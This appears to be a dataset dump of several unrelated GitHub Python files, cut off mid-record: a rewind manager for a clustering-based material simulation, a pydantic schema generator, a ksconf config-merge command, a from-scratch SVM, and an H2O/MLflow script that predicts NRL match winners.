crve.get_clusters_vf()\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Loop over material phases\n for mat_phase in material_phases:\n # Get cluster-reduced material phase\n crmp = cluster_phases[mat_phase]\n # Get clustering type\n clustering_type = crmp.get_clustering_type()\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Proceed according to clustering type\n if clustering_type == 'static':\n # Loop over material phase clusters\n for cluster in phase_clusters[mat_phase]:\n # Set cluster state variables\n clusters_state[str(cluster)] = \\\n copy.deepcopy(clusters_state_rew[str(cluster)])\n # Set cluster deformation gradient\n clusters_def_gradient_mf[str(cluster)] = copy.deepcopy(\n clusters_def_gradient_rew_mf[str(cluster)])\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n elif clustering_type == 'adaptive':\n # Get cluster-reduced material phase clustering tree nodes\n clustering_tree_nodes, root_cluster_node = \\\n crmp.get_clustering_tree_nodes()\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Get rewind state cluster nodes\n rewind_clusters_nodes = []\n for cluster in self._phase_clusters[mat_phase]:\n rewind_clusters_nodes.append(\n clustering_tree_nodes[str(cluster)])\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Initialize node walker\n node_walker = anytree.walker.Walker()\n # Loop over material phase clusters\n for cluster in phase_clusters[mat_phase]:\n # Get cluster node\n cluster_node = clustering_tree_nodes[str(cluster)]\n # Build walk from cluster node up to the root node\n node_walk_to_root = node_walker.walk(cluster_node,\n root_cluster_node)\n # Loop over walk nodes\n for node in node_walk_to_root[0]:\n # Find hierarchicaly closest rewind state cluster\n # node\n if node in rewind_clusters_nodes:\n # Get node cluster\n parent_cluster = int(node.name)\n # Set cluster state variables\n clusters_state[str(cluster)] = copy.deepcopy(\n clusters_state_rew[str(parent_cluster)])\n # Set cluster deformation gradient\n clusters_def_gradient_mf[str(cluster)] = \\\n copy.deepcopy(clusters_def_gradient_rew_mf[\n str(parent_cluster)])\n # Skip to the following cluster\n break\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n else:\n raise RuntimeError('Unknown material phase clustering '\n 'type.')\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Set material constitutive state at rewind state according to the\n # current clustering\n self._material_state.set_rewind_state_updated_clustering(\n phase_clusters, clusters_vf, clusters_state,\n clusters_def_gradient_mf)\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Return material constitutive state stored at rewind state\n # according to the update clustering\n return copy.deepcopy(self._material_state)\n # -------------------------------------------------------------------------\n def save_reference_material(self, ref_material):\n \"\"\"Save elastic reference material at rewind state.\n\n Parameters\n ----------\n ref_material : ElasticReferenceMaterial\n Elastic reference material at rewind state.\n \"\"\"\n # Save elastic reference material\n self._ref_material = copy.deepcopy(ref_material)\n # -------------------------------------------------------------------------\n def get_reference_material(self):\n \"\"\"Get elastic reference material at rewind state.\n\n Returns\n -------\n ref_material : ElasticReferenceMaterial\n Elastic reference material at rewind state.\n \"\"\"\n return copy.deepcopy(self._ref_material)\n # -------------------------------------------------------------------------\n def save_clusters_sct(self, clusters_sct_mf):\n \"\"\"Save clusters strain concentration tensors at rewind state.\n\n Parameters\n ----------\n clusters_sct_mf : dict\n Fourth-order strain concentration tensor (matricial form)\n (item, numpy.ndarray (2d)) associated with each material cluster\n (key, str).\n \"\"\"\n # Save clusters state variables\n self._clusters_sct_mf = copy.deepcopy(clusters_sct_mf)\n # -------------------------------------------------------------------------\n def get_clusters_sct(self):\n \"\"\"Get clusters strain concentration tensors at rewind state.\n\n Returns\n -------\n clusters_sct_mf : dict\n Fourth-order strain concentration tensor (matricial form)\n (item, numpy.ndarray (2d)) associated with each material cluster\n (key, str).\n \"\"\"\n # Save clusters state variables\n return copy.deepcopy(self._clusters_sct_mf)\n # -------------------------------------------------------------------------\n def save_asca_algorithmic_variables(self, global_strain_mf,\n farfield_strain_mf):\n \"\"\"Save ASCA algorithmic variables at rewind state.\n\n Parameters\n ----------\n global_strain_mf : numpy.ndarray (1d)\n Global vector of clusters strain tensors (matricial form).\n farfield_strain_mf : numpy.ndarray (1d), default=None\n Far-field strain tensor (matricial form).\n \"\"\"\n # Save global vector of clusters strain tensors\n self._global_strain_mf = copy.deepcopy(global_strain_mf)\n # Save far-field strain tensor\n self._farfield_strain_mf = farfield_strain_mf\n # -------------------------------------------------------------------------\n def get_asca_algorithmic_variables(self):\n \"\"\"Get ASCA algorithmic variables at rewind state.\n\n Returns\n -------\n global_strain_mf : numpy.ndarray (1d)\n Global vector of clusters strain tensors (matricial form).\n farfield_strain_mf : numpy.ndarray (1d), default=None\n Far-field strain tensor (matricial form).\n \"\"\"\n return copy.deepcopy(self._global_strain_mf), \\\n copy.deepcopy(self._farfield_strain_mf)\n # -------------------------------------------------------------------------\n def rewind_output_files(self, hres_output=None, efftan_output=None,\n ref_mat_output=None, voxels_output=None,\n adapt_output=None, vtk_output=None):\n \"\"\"Rewind output files to the rewind state.\n\n Parameters\n ----------\n hres_output : HomResOutput\n Output associated with the homogenized results.\n efftan_output : EffTanOutput\n Output associated with the CRVE effective tangent modulus.\n ref_mat_output : RefMatOutput\n Output associated with the reference material.\n voxels_output : VoxelsOutput\n Output associated with voxels material-related quantities.\n adapt_output : ClusteringAdaptivityOutput\n Output associated with the clustering adaptivity procedures.\n vtk_output : VTKOutput\n Output associated with the VTK files.\n \"\"\"\n # Rewind output files\n if hres_output is not None:\n hres_output.rewind_file(self._rewind_inc)\n if efftan_output is not None:\n efftan_output.rewind_file(self._rewind_inc)\n if ref_mat_output is not None:\n ref_mat_output.rewind_file(self._rewind_inc)\n if voxels_output is not None:\n voxels_output.rewind_file(self._rewind_inc)\n if adapt_output is not None:\n adapt_output.rewind_file(self._rewind_inc)\n if vtk_output is not None:\n vtk_output.rewind_files(self._rewind_inc)\n# =============================================================================\nclass RewindManager:\n \"\"\"Manage analysis rewind operations and evaluate analysis rewind criteria.\n\n Attributes\n ----------\n _n_rewinds : int\n Number of rewind operations.\n _rewind_time : float\n Total time spent in rewind operations and in deleted analysis\n increments.\n _init_time : float\n Reference time.\n\n Methods\n -------\n get_rewind_time(self)\n Get total time of rewind operations and deleted analysis increments.\n update_rewind_time(self, mode='init')\n Update total rewind time.\n is_rewind_available(self)\n Evaluate if rewind operations are available.\n is_save_rewind_state(self, inc)\n Evaluate conditions to save rewind state.\n is_rewinding_criteria(self, inc, material_phases, phase_clusters, \\\n clusters_state)\n Check analysis rewinding criteria.\n get_save_rewind_state_criteria()\n Get available rewind state storage criteria and default parameters.\n get_rewinding_criteria()\n Get rewinding criteria and default parameters.\n \"\"\"\n def __init__(self, rewind_state_criterion, rewinding_criterion,\n max_n_rewinds=1):\n \"\"\"Analysis rewind manager constructor.\n\n Parameters\n ----------\n rewind_state_criterion : tuple\n Rewind state storage criterion [0] and associated parameter [1].\n rewinding_criterion : tuple\n Rewinding criterion [0] and associated parameter [1].\n max_n_rewinds : int, default=1\n Maximum number of rewind operations.\n \"\"\"\n self._rewind_state_criterion = rewind_state_criterion\n self._rewinding_criterion = rewinding_criterion\n self._max_n_rewinds = max_n_rewinds\n # Initialize number of rewind operations\n self._n_rewinds = 0\n # Initialize total rewind time\n self._rewind_time = 0\n # -------------------------------------------------------------------------\n def get_rewind_time(self):\n \"\"\"Get total time of rewind operations and deleted analysis increments.\n\n Returns\n -------\n rewind_time : float\n Total time of rewind operations and in deleted analysis increments.\n \"\"\"\n return self._rewind_time\n # -------------------------------------------------------------------------\n def update_rewind_time(self, mode='init'):\n \"\"\"Update total rewind time.\n\n Parameters\n ----------\n mode : {'init', 'update'}, default='init'\n \"\"\"\n if mode == 'init':\n # Set reference initial time\n self._init_time = time.time()\n elif mode == 'update':\n # Update total rewind time\n self._rewind_time += time.time() - self._init_time\n # Set reference initial time\n self._init_time = time.time()\n else:\n raise RuntimeError('Unknown mode.')\n # -------------------------------------------------------------------------\n def is_rewind_available(self):\n \"\"\"Evaluate if rewind operations are available.\n\n Returns\n -------\n is_available : bool\n True if rewind operations are available, False otherwise.\n \"\"\"\n # Initialize rewind operations availability\n is_available = True\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Evaluate maximum number of rewind operations\n if self._n_rewinds >= self._max_n_rewinds:\n is_available = False\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Return rewind operations availability\n return is_available\n # -------------------------------------------------------------------------\n def is_save_rewind_state(self, inc):\n \"\"\"Evaluate conditions to save rewind state.\n\n Parameters\n ----------\n inc : int\n Macroscale loading increment.\n\n Returns\n -------\n is_save_state : bool\n True if conditions to save rewind state are satisfied, False\n otherwise.\n \"\"\"\n # Initialize save rewind state flag\n is_save_state = False\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Get rewind state criterion\n criterion = self._rewind_state_criterion[0]\n # Evaluate rewind state criterion\n if criterion == 'increment_number':\n # Evaluate increment number\n if inc == self._rewind_state_criterion[1]:\n is_save_state = True\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n else:\n raise RuntimeError('Unknown rewind state criterion.')\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Return save rewind state flag\n return is_save_state\n # -------------------------------------------------------------------------\n def is_rewinding_criteria(self, inc, material_phases, phase_clusters,\n clusters_state):\n \"\"\"Check analysis rewinding criteria.\n\n Parameters\n ----------\n inc : int\n Macroscale loading increment.\n material_phases : list[str]\n CRVE material phases labels (str).\n phase_clusters : dict\n Clusters labels (item, list[int]) associated with each material\n phase (key, str).\n clusters_state : dict\n Material constitutive model state variables (item, dict) associated\n with each material cluster (key, str).\n\n Returns\n -------\n is_rewind : bool\n True if analysis rewinding criteria are satisfied, False otherwise.\n \"\"\"\n # Initialize analysis rewind flag\n is_rewind = False\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Get rewinding criterion\n criterion = self._rewinding_criterion[0]\n # Evaluate analysis rewinding criterion\n if criterion == 'increment_number':\n # Evaluate increment number\n is_rewind = inc == self._rewinding_criterion[1]\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n elif criterion == 'max_acc_p_strain':\n # Evaluate accumulated plastic strain threshold\n for mat_phase in material_phases:\n # Loop over material phase clusters\n for cluster in phase_clusters[mat_phase]:\n # Get cluster state variables\n state_variables = clusters_state[str(cluster)]\n # Check if accumulated plastic strain is cluster state\n # variable\n if 'acc_p_strain' not in state_variables:\n continue\n # Evaluate accumulated plastic strain\n if state_variables['acc_p_strain'] \\\n > self._rewinding_criterion[1]:\n is_rewind = True\n break\n if is_rewind:\n break\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n else:\n raise RuntimeError('Unknown rewinding criterion.')\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Increment number of rewind operations\n if is_rewind:\n self._n_rewinds += 1\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Return analysis rewinding flag\n return is_rewind\n # -------------------------------------------------------------------------\n @staticmethod\n def get_save_rewind_state_criteria():\n \"\"\"Get available rewind state storage criteria and default parameters.\n\n Returns\n -------\n available_save_rewind_state_criteria : dict\n Available rewind state storage criteria (key, str) and associated\n default parameters (item).\n \"\"\"\n # Set available rewind state storage criteria\n available_save_rewind_state_criteria = {'increment_number': 0, }\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Return\n return available_save_rewind_state_criteria\n # -------------------------------------------------------------------------\n @staticmethod\n def get_rewinding_criteria():\n \"\"\"Get rewinding criteria and default parameters.\n\n Returns\n -------\n available_rewinding_criteria : dict\n Available rewinding criteria (key, str) and associated default\n parameters (item).\n \"\"\"\n # Set available rewinding criteria\n available_rewinding_criteria = {'increment_number': 0,\n 'max_acc_p_strain': 1.0e-10}\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Return\n return available_rewinding_criteria\n","repo_name":"bessagroup/CRATE","sub_path":"src/cratepy/online/loading/macloadincrem.py","file_name":"macloadincrem.py","file_ext":"py","file_size_in_byte":68287,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"72"} +{"seq_id":"27031717760","text":"from swagger_server.schemas.family import Family\nimport yaml\nfrom pydantic import schema\n\n\ndef get_schemas(schema_list=None):\n\n if schema_list is None:\n schema_list = [\n Family\n ]\n\n s = schema.schema(\n schema_list,\n ref_prefix=\"#/components/schemas/\",\n )\n return s[\"definitions\"]\n\n\nif __name__ == \"__main__\":\n print(yaml.dump(get_schemas))\n","repo_name":"karthik-lp/shrey_info","sub_path":"rest_server/swagger_server/schema_generator.py","file_name":"schema_generator.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22900031084","text":"\"\"\"\nSUBCOMMAND: ``ksconf merge --target= [ ... ]``\n\nUsage example:\n\n.. code-block:: sh\n\n ksconf merge --target=master-props.conf /opt/splunk/etc/apps/*TA*/{default,local}/props.conf\n\n\"\"\"\nfrom __future__ import absolute_import, unicode_literals\n\nimport os\n\nfrom ksconf.command import ConfFileProxy, ConfFileType, KsconfCmd, dedent\nfrom ksconf.conf.merge import merge_conf_files\nfrom ksconf.conf.parser import PARSECONF_MID, PARSECONF_STRICT\nfrom ksconf.consts import EXIT_CODE_BAD_ARGS, EXIT_CODE_SUCCESS\nfrom ksconf.util.completers import conf_files_completer\n\n\nclass MergeCmd(KsconfCmd):\n help = \"Merge two or more .conf files\"\n description = dedent(\"\"\"\\\n Merge two or more .conf files into a single combined .conf file.\n This is similar to the way that Splunk logically combines the ``default`` and ``local``\n folders at runtime.\n \"\"\")\n maturity = \"stable\"\n\n def register_args(self, parser):\n parser.add_argument(\"conf\", nargs=\"+\",\n help=\"The source configuration file(s) to collect settings from.\"\n ).completer = conf_files_completer\n parser.add_argument(\"--target\", \"-t\",\n type=ConfFileType(\"r+\", \"none\", parse_profile=PARSECONF_STRICT),\n default=ConfFileProxy(\"\", \"w\", self.stdout), help=dedent(\"\"\"\\\n Destination file for merged configurations.\n If not provided, the merged conf is written to standard output.\"\"\")\n ).completer = conf_files_completer\n\n # This is helpful when writing bash expressions like MyApp/{default,local}/props.conf;\n # when either default or local may not be present.\n parser.add_argument(\"--ignore-missing\", \"-s\", default=False, action=\"store_true\",\n help=\"Silently ignore any missing CONF files.\")\n\n parser.add_argument(\"--in-place\", \"-i\", default=False, action=\"store_true\",\n help=dedent(\"\"\"\n Enable in-place update mode. When selected, the TARGET file will also be considered as\n the base of the merge operation. All CONF files will be merged with TARGET.\n When disabled, any existing content within TARGET is ignored and overwritten.\"\"\"))\n\n parser.add_argument(\"--dry-run\", \"-D\", default=False, action=\"store_true\", help=dedent(\"\"\"\\\n Enable dry-run mode.\n Instead of writing to TARGET, preview changes in 'diff' format.\n If TARGET doesn't exist, then show the merged file.\"\"\"))\n parser.add_argument(\"--banner\", \"-b\", default=\"\", help=dedent(\"\"\"\\\n A banner or warning comment added to the top of the TARGET file.\n Used to discourage Splunk admins from editing an auto-generated file.\"\"\"))\n\n def pre_run(self, args):\n if args.in_place:\n if args.target.name == \"\":\n self.stderr.write(\"In-place mode require '--target=FILE'.\\n\")\n return EXIT_CODE_BAD_ARGS\n # Insert target as the first source CONF file to parse\n args.conf.insert(0, args.target.name)\n\n def run(self, args):\n ''' Merge multiple configuration files into one '''\n self.parse_profile = PARSECONF_MID\n\n if args.ignore_missing:\n cfgs = [self.parse_conf(c) for c in args.conf if os.path.isfile(c) or c == \"-\"]\n else:\n cfgs = [self.parse_conf(conf) for conf in args.conf]\n\n merge_conf_files(args.target, cfgs, dry_run=args.dry_run,\n banner_comment=args.banner)\n return EXIT_CODE_SUCCESS\n","repo_name":"Kintyre/ksconf","sub_path":"ksconf/commands/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"72"} +{"seq_id":"74421579434","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\"\"\"\r\nソフトマージンSVM\r\n\"\"\"\r\n\r\nclass MySVM:\r\n \r\n \r\n def __init__(self,C=1.0,episode=100):\r\n self.alpha = 0.1\r\n self.support_vector_number=[]\r\n self.episode = episode\r\n self.omega = None\r\n self.sita = None\r\n self.C=C\r\n \r\n\r\n \r\n def get_first_lamda(self):\r\n \"\"\"lambdaの初期値設定\"\"\"\r\n self.lamda = np.random.uniform(1,0,len(self.X))\r\n \r\n \r\n \r\n def get_omega(self):\r\n \"\"\"omegaを出す\"\"\"\r\n _sum = 0\r\n for _ in range(len(self.Y)):\r\n _sum = _sum + np.dot(self.lamda[_]*self.Y[_],self.X[_])\r\n\r\n self.omega = _sum\r\n \r\n \r\n def get_sita(self):\r\n \"\"\"サポートベクターの中でも、教師ラベルが正と負のものがある\r\n それぞれの値の偏りを無くすため、正の教師ラベルの領域、負の教師ラベルの領域から\r\n もし存在すればそれらの平均によってバイアス値self.sitaを定義する\r\n \"\"\"\r\n _p=[]\r\n _n=[]\r\n for _ in self.support_vector_number:\r\n if self.Y[_]==1:\r\n _p.append(_)\r\n else:\r\n _n.append(_)\r\n if (len(_p) and len(_n)) !=0:\r\n self.sita = -0.5 * (np.dot(self.omega.T,self.X[_p[-1]])+np.dot(self.omega.T,self.X[_n[0]]))\r\n else:\r\n self.sita = self.Y[self.support_vector_number[-1]]-np.dot(self.omega.T,self.X[self.support_vector_number[-1]])\r\n\r\n \r\n def read_csv(self):\r\n \"\"\"読み込むデータによって変える\"\"\"\r\n \r\n self.X = np.loadtxt(fname=\"data1.csv\",dtype='float',skiprows=5,usecols=(4,7),delimiter=',')\r\n self.Y = np.loadtxt(fname=\"data1.csv\",dtype= 'unicode',skiprows=5,usecols=(1),delimiter=',')\r\n \r\n \r\n for _ in range(len(self.Y)):\r\n if '雨' in self.Y[_]:\r\n self.Y[_] = 1\r\n \r\n else:\r\n self.Y[_] = -1\r\n \r\n #self.X = np.loadtxt(fname=\"testdata.csv\",dtype='float',skiprows=1,usecols=(0,1),delimiter=',')\r\n #self.Y = np.loadtxt(fname=\"testdata.csv\",dtype= 'float',skiprows=1,usecols=(2),delimiter=',')\r\n self.Y = self.Y.astype(float)\r\n \r\n \r\n def standardzation(self):\r\n \"\"\"元のデータの正規化\"\"\"\r\n self.raw_X = self.X\r\n self.X = (self.X-self.X.mean(keepdims=True))/self.X.std(keepdims=True)\r\n \r\n \r\n def restandardzation(self):\r\n \"\"\"正規化データを元のデータに戻す\"\"\"\r\n self.X = self.raw_X\r\n \r\n \r\n def limit_lamda(self):\r\n \"\"\"制約条件の「ラグランジュ乗数と教師ラベルの掛け算の和が0」を満たすための正規化\r\n\r\n 教師ラベルの正負でラグランジュ乗数を分けてそれぞれで和が1になるようにそれぞれ\r\n 一つ一つのデータを\r\n 正の教師ラベルを持つlambdaの値の和、負の教師ラベルを持つlambdaの値の和で割る\r\n \"\"\"\r\n _sum1 = 0\r\n _sum2 = 0\r\n for _ in range(len(self.Y)):\r\n if self.Y[_]==1:\r\n _sum1 = _sum1 + self.lamda[_]*self.Y[_]\r\n else:\r\n _sum2 = _sum2 + self.lamda[_]*(-self.Y[_])\r\n \r\n \r\n\r\n for _ in range(len(self.Y)):\r\n if self.Y[_]==1:\r\n self.lamda[_] = self.lamda[_]/_sum1\r\n else:\r\n self.lamda[_] = self.lamda[_]/_sum2\r\n \r\n \r\n def gradient_descent(self):\r\n \"\"\"更新式\"\"\"\r\n for _i in range(len(self.lamda)):\r\n _sum = 0\r\n for _j in range(len(self.Y)):\r\n _sum = _sum + self.lamda[_j]*self.Y[_i]*self.Y[_j]*( np.dot(self.X[_j].T,self.X[_i]) )\r\n self.lamda[_i] = self.lamda[_i] + self.alpha*(1-_sum)\r\n \r\n\r\n def main(self):\r\n \"\"\"main文\"\"\"\r\n \"\"\"まずはデータの整形\"\"\"\r\n self.read_csv()\r\n self.standardzation()\r\n self.get_first_lamda()\r\n \r\n \"\"\"\r\n 最急降下法によって正規化\r\n 毎回更新時にlambdaを制約条件に当てはまるように正規化\r\n \"\"\"\r\n for _ in range(self.episode):\r\n \r\n self.limit_lamda()\r\n \r\n self.gradient_descent()\r\n\r\n self.limit_lamda()\r\n self.restandardzation()\r\n\r\n \"\"\"サポートベクターの抽出\"\"\"\r\n for _ in range(len(self.lamda)):\r\n if self.lamda[_]>0 and self.lamda[_]<=self.C:\r\n self.support_vector_number.append(_)\r\n\r\n \"\"\"omegaとsitaを出す\"\"\"\r\n self.get_omega()\r\n self.get_sita()\r\n\r\n \r\nif __name__ == \"__main__\":\r\n \r\n \"\"\"Cのデフォルト値は1.0、最急降下法の繰り返しのデフォルト値は100\"\"\"\r\n svm=MySVM(C=0.2,episode=10)\r\n svm.main()\r\n\r\n print(svm.lamda)\r\n print(svm.omega,svm.sita)\r\n \r\n for _ in svm.support_vector_number:\r\n print(svm.X[_])\r\n \r\n \r\n \r\n a= -svm.omega[0]/svm.omega[1]\r\n xx= np.linspace(0,20)\r\n yy= a*xx - (svm.sita)/svm.omega[1]\r\n\r\n\r\n\r\n \r\n plt.plot(xx, yy, 'k-')\r\n \r\n plt.scatter(svm.X[:,0], svm.X[:,1],s=80, facecolors='none')\r\n plt.scatter(svm.X[:, 0], svm.X[:, 1], c=svm.Y)\r\n\r\n \r\n plt.axis('tight')\r\n\r\n plt.show()\r\n\r\n","repo_name":"yamatomatsuda/SVM","sub_path":"SVM.py","file_name":"SVM.py","file_ext":"py","file_size_in_byte":5410,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6516120808","text":"import matplotlib\nimport argparse\nimport mlflow\nfrom h2o.estimators.gbm import H2OGradientBoostingEstimator\nfrom h2o.grid.grid_search import H2OGridSearch\nimport h2o\nimport numpy as np\nimport pyarrow.parquet as pq\nfrom common_functions import get_metrics, log_metrics, log_artifacts, split_df, move_files, file_swap_s3\nimport os\nimport glob\nimport configparser\nimport s3fs\nimport sys\nimport random\nmatplotlib.use('Agg')\n\n\ndef get_data(access_key, secret_key, location):\n\n # access s3 file system\n s3 = s3fs.S3FileSystem(key=access_key, secret=secret_key)\n\n # get parquet file from s3 as pandas data frame\n df = pq.ParquetDataset(location, filesystem=s3)\\\n .read_pandas()\\\n .to_pandas()\n\n return df\n\n\ndef convert_vars(train, test):\n\n to_categorical_list = [\n 'away_rest',\n 'home_rest',\n 'rest_spread',\n 'home_ranking_quantile',\n 'away_ranking_quantile',\n 'home_position',\n 'away_position',\n 'home_previous_result',\n 'away_previous_result',\n 'home_wins_in_a_row',\n 'home_losses_in_a_row',\n 'away_wins_in_a_row',\n 'away_losses_in_a_row',\n 'day_of_week',\n 'hour',\n ]\n\n k = random.randrange(1, len(to_categorical_list)+1)\n\n random_categorical_list = random.sample(to_categorical_list, k)\n\n for col in random_categorical_list:\n train['{}'.format(col)] = train['{}'.format(col)].asfactor()\n test['{}'.format(col)] = test['{}'.format(col)].asfactor()\n\n train['winner'] = train['winner'].asfactor()\n test['winner'] = test['winner'].asfactor()\n\n return train, test, random_categorical_list\n\n\ndef formulate_grid(train_set, test_set, max_run_time_secs, seed):\n\n # sample parameters for GBM\n gbm_params1 = {\"max_depth\": [i for i in range(2, 51)],\n \"ntrees\": [i for i in range(2, 51)],\n \"min_rows\": [i for i in range(8, 144, 8)],\n \"nbins\": [16, 32, 64, 128, 256, 512, 1024],\n \"sample_rate\": [i for i in np.arange(0.2, 1, 0.01)],\n \"learn_rate\": [i for i in np.arange(0.01, 0.2, 0.01)],\n \"learn_rate_annealing\": [i for i in np.arange(0.9, 1, 0.01)],\n \"col_sample_rate\": [i for i in np.arange(0.2, 1, 0.01)],\n \"nbins_cats\": [16, 32, 64, 128, 256, 512, 1024, 2048, 4096],\n \"col_sample_rate_per_tree\": [i for i in np.arange(0.2, 1, 0.01)],\n \"min_split_improvement\": [0e+00, 1e-08, 1e-06, 1e-04],\n \"distribution\": ['multinomial'],\n \"histogram_type\": [\"UniformAdaptive\",\n \"QuantilesGlobal\",\n \"RoundRobin\"],\n \"col_sample_rate_change_per_level\": [i for i in np.arange(0.2, 1.5, 0.01)]}\n\n # Search criteria\n search_criteria = {'strategy': 'RandomDiscrete',\n 'seed': seed,\n 'max_runtime_secs': max_run_time_secs,\n 'stopping_tolerance': 0.00001}\n\n # Train and validate a grid of GBMs\n gbm_grid = H2OGridSearch(model=H2OGradientBoostingEstimator,\n grid_id='gbm_grid1',\n hyper_params=gbm_params1,\n search_criteria=search_criteria)\n preds = ['home_team',\n 'home_odds',\n 'away_odds',\n 'day_of_week',\n 'night_game',\n 'hour',\n 'first_round',\n 'second_round',\n 'home_wins_in_a_row',\n 'home_losses_in_a_row',\n 'home_position',\n 'home_ranking_quantile',\n 'home_points',\n 'home_for_per_game',\n 'home_against_per_game',\n 'home_rest',\n 'home_previous_result',\n 'home_time_from_last_win',\n 'home_time_from_last_extra_time_game',\n 'home_time_from_last_loss',\n 'home_time_from_last_draw',\n 'away_team',\n 'away_position',\n 'away_points',\n 'away_wins_in_a_row',\n 'away_losses_in_a_row',\n 'away_ranking_quantile',\n 'away_for_per_game',\n 'away_against_per_game',\n 'away_rest',\n 'away_previous_result',\n 'away_time_from_last_win',\n 'away_time_from_last_extra_time_game',\n 'away_time_from_last_loss',\n 'away_time_from_last_draw',\n 'rest_spread']\n\n try:\n gbm_grid.train(x=preds, y='winner',\n training_frame=train_set,\n validation_frame=test_set,\n seed=seed\n )\n except:\n h2o.cluster().shutdown()\n sys.exit()\n\n gbm_grid_perf = gbm_grid.get_grid(sort_by='r2', decreasing=True)\n\n return gbm_grid_perf, preds\n\n\nif __name__ == \"__main__\":\n\n args_parser = argparse.ArgumentParser(description='Predict NRL Scores GBM')\n args_parser.add_argument('--max_run_time_secs', type=int, required=False)\n args_parser.add_argument('--seed', type=int, required=False)\n args_parser.add_argument('--location', type=str, required=False)\n args_parser.add_argument('--config', type=str, required=False)\n\n args = args_parser.parse_args()\n\n if args.max_run_time_secs:\n max_run_time_secs = args.max_run_time_secs\n else:\n max_run_time_secs = 200\n\n if args.seed:\n seed = args.seed\n else:\n seed = 1234\n\n if args.location:\n location = args.location\n else:\n location = 'nrl-prediction-analysis.com/previous-nrl-results.parquet.gzip'\n\n if args.config:\n config_name = args.config\n else:\n config_name = 'nrl_config.ini'\n\n h2o.init()\n h2o.cluster().shutdown()\n\n # load in config file\n config = configparser.ConfigParser()\n config.read(config_name)\n\n # get secret keys from config file\n access_key = config['aws']['aws_access_key_id']\n secret_key = config['aws']['aws_secret_access_key']\n\n file_swap_s3(access_key, secret_key, \"s3://nrl-prediction-analysis.com/mlruns/\", os.getcwd() + '/mlruns/')\n\n mlflow.set_experiment(\"predict-winner-nrl\")\n\n df = get_data(access_key, secret_key, location)\n\n train, test = split_df(df, random=False)\n\n train, test, random_categorical_list = convert_vars(train, test)\n\n # list of models, ordered from best to worst performing\n grid, predictors = formulate_grid(train, test, max_run_time_secs, int(seed))\n\n # now we log the results in mlflow\n ranking = 1\n for model in grid:\n\n mlflow.start_run()\n\n print(\"\\nMetrics for no {} model\".format(ranking))\n\n ranking += 1\n\n r2_metrics, mse_metrics, rmse_metrics, auc_metrics = get_metrics(model, train, test)\n\n log_metrics(r2_metrics, mse_metrics, rmse_metrics)\n\n script_name = sys.argv[0]\n\n log_artifacts(model, script_name)\n\n for keys in model.params:\n mlflow.log_param(keys, model.params[keys]['actual'])\n\n mlflow.log_param(\"independent_variables\", predictors)\n\n mlflow.log_param(\"categorical_variables\", random_categorical_list)\n\n # change where the artifacts save\n path = mlflow.get_artifact_uri().replace(\"file://\", \"\")\n path_split = path.split('/')\n path_split[4] = \"mlruns_artifacts\"\n new_path = '/'.join(path_split)\n\n move_files(path, new_path)\n\n mlflow.end_run()\n\n # Remove files that are already saved else where\n for filename in glob.glob(\"gbm_grid1_model*\"):\n os.remove(os.getcwd() + '/' + filename)\n\n if ranking == 3:\n break\n\n mlflow.end_run()\n\n if os.path.isfile(os.getcwd() + \"/h2o-genmodel.jar\"):\n os.remove(os.getcwd() + \"/h2o-genmodel.jar\")\n\n if os.path.isfile(os.getcwd() + \"/var_imp.png\"):\n os.remove(os.getcwd() + 